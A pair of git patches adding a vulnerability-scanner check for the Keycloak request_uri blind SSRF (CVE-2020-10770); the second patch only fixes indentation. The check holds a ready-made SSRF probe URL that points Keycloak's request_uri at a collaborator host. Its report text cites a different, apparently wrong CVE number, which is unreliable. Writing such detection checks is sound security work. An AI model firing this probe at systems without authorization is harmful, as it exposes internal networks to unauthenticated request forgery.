From e3306de7b91be5836701c01e7b57aea07bea7fab Mon Sep 17 00:00:00 2001
From: MOHAMMAD SAQLAIN <32585833+mrrootsec@users.noreply.github.com>
Date: Wed, 12 Jul 2023 10:28:02 +0530
Subject: [PATCH 1/2] Create CVE-2020-10770 Keycloak request_uri SSRF

CVE-2020-10770 Keycloak request_uri SSRF
---
 .../CVE-2020-10770 Keycloak request_uri SSRF  | 30 +++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 vulnerabilities-CVEd/CVE-2020-10770 Keycloak request_uri SSRF

diff --git a/vulnerabilities-CVEd/CVE-2020-10770 Keycloak request_uri SSRF b/vulnerabilities-CVEd/CVE-2020-10770 Keycloak request_uri SSRF
new file mode 100644
index 0000000..7134302
--- /dev/null
+++ b/vulnerabilities-CVEd/CVE-2020-10770 Keycloak request_uri SSRF	
@@ -0,0 +1,30 @@
+metadata:
+    language: v1-beta
+    name: "Keycloak before 12.0.1 version - request_uri Blind Server-Side Request Forgery (Unauthenticated)"
+    description: "Keycloak allows an unauthenticated attacker to send arbitrary values in 'request_uri' parameter and interact with internal network resources which is otherwise not accessible externally. An attacker may use this feature to perform Blind SSRF (Server-side request forgery) attacks on the server."
+    author: "mrrootsec"
+    tags: "keycloak","cve","ssrf"
+
+run for each:
+potential_path = `/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{generate_collaborator_address()}`
+
+given host then
+  send request:
+    method: `GET`
+    path: {potential_path}
+
+if dns interactions then
+    report issue:
+      severity: info
+      confidence: certain
+      detail: "Vulnerable to CVE-2021-10774 - Keycloak - request_uri Blind Server-Side Request Forgery (SSRF)"
+      remediation: "Upgrade to the latest version of Keycloak"
+  end if
+
+  if http interactions then
+    report issue:
+      severity: high
+      confidence: certain
+      detail: "Vulnerable to CVE-2021-10774 - Keycloak - request_uri Blind Server-Side Request Forgery (SSRF)"
+      remediation: "Upgrade to the latest version of Keycloak"
+  end if

From 213c5469e94029cfe89d78212a482f864fc261ae Mon Sep 17 00:00:00 2001
From: MOHAMMAD SAQLAIN <32585833+mrrootsec@users.noreply.github.com>
Date: Thu, 13 Jul 2023 07:53:57 +0530
Subject: [PATCH 2/2] Update CVE-2020-10770 Keycloak request_uri SSRF

Fixed indentation.. Please review it again
---
 .../CVE-2020-10770 Keycloak request_uri SSRF  | 22 +++++++++----------
 1 file changed, 11 insertions(+), 11 deletions(-)

diff --git a/vulnerabilities-CVEd/CVE-2020-10770 Keycloak request_uri SSRF b/vulnerabilities-CVEd/CVE-2020-10770 Keycloak request_uri SSRF
index 7134302..bb446ba 100644
--- a/vulnerabilities-CVEd/CVE-2020-10770 Keycloak request_uri SSRF	
+++ b/vulnerabilities-CVEd/CVE-2020-10770 Keycloak request_uri SSRF	
@@ -1,19 +1,19 @@
 metadata:
-    language: v1-beta
-    name: "Keycloak before 12.0.1 version - request_uri Blind Server-Side Request Forgery (Unauthenticated)"
-    description: "Keycloak allows an unauthenticated attacker to send arbitrary values in 'request_uri' parameter and interact with internal network resources which is otherwise not accessible externally. An attacker may use this feature to perform Blind SSRF (Server-side request forgery) attacks on the server."
-    author: "mrrootsec"
-    tags: "keycloak","cve","ssrf"
+  language: v1-beta
+  name: "Keycloak before 12.0.1 version - request_uri Blind Server-Side Request Forgery (Unauthenticated)"
+  description: "Keycloak allows an unauthenticated attacker to send arbitrary values in 'request_uri' parameter and interact with internal network resources which is otherwise not accessible externally. An attacker may use this feature to perform Blind SSRF (Server-side request forgery) attacks on the server."
+  author: "mrrootsec"
+  tags: "keycloak", "cve", "ssrf"
 
 run for each:
-potential_path = `/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{generate_collaborator_address()}`
+  potential_path = `/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{generate_collaborator_address()}`
 
-given host then
-  send request:
-    method: `GET`
-    path: {potential_path}
+  given host then
+    send request:
+      method: `GET`
+      path: {potential_path}
 
-if dns interactions then
+  if dns interactions then
     report issue:
       severity: info
       confidence: certain